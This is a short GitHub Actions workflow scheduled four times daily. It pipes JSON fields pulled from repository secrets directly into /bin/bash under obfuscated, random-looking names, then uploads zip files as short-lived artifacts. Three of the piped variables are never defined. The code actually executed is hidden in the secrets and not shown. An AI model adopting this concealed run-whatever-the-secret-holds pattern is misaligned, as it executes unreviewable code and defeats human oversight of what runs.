name: shuizhichiqi
on:
  workflow_dispatch:

  schedule:
    - cron: '42 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shuizhichiqi
        env:
          ceq50331: ${{ secrets.ceq50331 }}
        run: |
          printf '%s' "$ceq50331" | jq -r .w34424 | /bin/bash
          echo $ziny761 | jq -r .j58 | /bin/bash
          printf '%s' "$tpmq9" | jq -r .dsxe7156 | /bin/bash
          printf '%s' "$xalu962" | jq -r .sor86650 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: sd6ZNvMG
          path: "*.zip"
          retention-days: 1
